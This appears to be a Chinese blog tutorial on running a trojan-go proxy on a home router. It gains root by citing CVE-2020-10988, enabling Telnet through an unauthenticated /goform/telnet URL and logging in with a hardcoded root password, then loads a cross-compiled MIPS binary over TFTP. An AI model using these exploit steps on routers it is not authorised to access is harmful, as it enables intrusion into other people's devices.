• 如何在路由器上安装代理服务：详细教程
  • 步骤一：通过漏洞进入路由器系统
  • 开启Telnet服务
  • 使用Telnet登录路由器系统
  • 查看系统信息和CPU信息
  • 步骤二：交叉编译MIPS程序
    • Go对MIPS的支持
  • 安装TFTP Server
  • 使用BusyBox tftp传输文件
  • 在路由器系统中下载编译后的main文件
  • 步骤三：安装和运行代理服务
  • 结论
  • 相关参考：

如何在路由器上安装代理服务：详细教程

在这篇文章中，我们将详细介绍如何在路由器上安装代理服务。这包括从通过Telnet登录路由器系统，到在路由器上运行代理程序的每一个步骤。

步骤一：通过漏洞进入路由器系统

首先，我们需要进入路由器的系统。可以通过搜索该路由器厂商的相关漏洞来实现这一点。例如，CVE-2020-10988是一个已知的漏洞，可以帮助我们访问路由器系统。

开启Telnet服务

访问 http://192.168.0.1/goform/telnet，响应信息显示 telnet is up. 表示Telnet服务已开启。

使用Telnet登录路由器系统

在命令行中输入以下命令，使用默认的用户名和密码登录路由器系统：

telnet 192.168.0.1
用户名：root
密码：Fireitup

查看系统信息和CPU信息

登录成功后，输入以下命令查看系统信息：

~ # cat /proc/version
Linux version 3.3.8 (root@linux-qxix) (gcc version 4.9.3 (Buildroot 2015.08) ) #1 Tue Dec 17 22:33:06 CST 2019

以及CPU信息：

~ # cat /proc/cpuinfo
system type             : Qualcomm Atheros QCA956X rev 0
machine                 : Qualcomm Atheros AP152 reference board
processor               : 0
cpu model               : MIPS 74Kc V5.0
BogoMIPS                : 385.84
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8]
ASEs implemented        : mips16 dsp
shadow register sets    : 1
kscratch registers      : 0
core                    : 0
VCED exceptions         : not available
VCEI exceptions         : not available

步骤二：交叉编译MIPS程序

根据上一步获取的CPU信息，我们知道该路由器使用的是MIPS架构的处理器。因此，我们需要使用Go语言交叉编译一个MIPS程序。

Go对MIPS的支持

参考Go的官方文档，确认Go对MIPS的支持情况：
获取上述信息后，使用 Go 交叉编译 MIPS 程序。
Go MIPS支持

安装TFTP Server

我们需要安装一个TFTP服务器以便在路由器和本地机器之间传输文件。可以使用tftpd64：

TFTP服务器

使用BusyBox tftp传输文件

路由器系统中一般预装了BusyBox，可以使用tftp命令从TFTP服务器下载或上传文件。

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

        -l FILE Local FILE
        -r FILE Remote FILE
        -g      Get file
        -p      Put file
        -b SIZE Transfer blocks of SIZE octets

下载文件：

tftp -g -r FilePath Host

上传文件：

tftp -p -l FilePath Host

在路由器系统中下载编译后的main文件

tftp -g -r main 192.168.0.142
main                 100% |********************************************************|  1088k  0:00:00 ETA

下载完成后，给文件添加执行权限并运行：

chmod +x main
./main

运行后应该看到类似 Hello cheungxiongwei 的输出。

步骤三：安装和运行代理服务

下载trojan-go
我们选择下载mips-softfloat版本的trojan-go。下载完成后，将压缩包转换成tar格式，以便在路由器系统中解压。
部署代理即可通过路由器访问外面的世界了。

结论

通过以上步骤，我们成功在路由器上安装并运行了一个代理服务。这使得路由器能够通过代理访问外部网络。通过详细的教程，我们可以轻松实现这一目标，并为日后的网络优化提供更多可能性。

相关参考：

• https://cloud.tencent.com/developer/article/2207058
• https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68
• https://www.ise.io/wp-content/uploads/2020/08/kicking_devices_and_taking_cves.pdf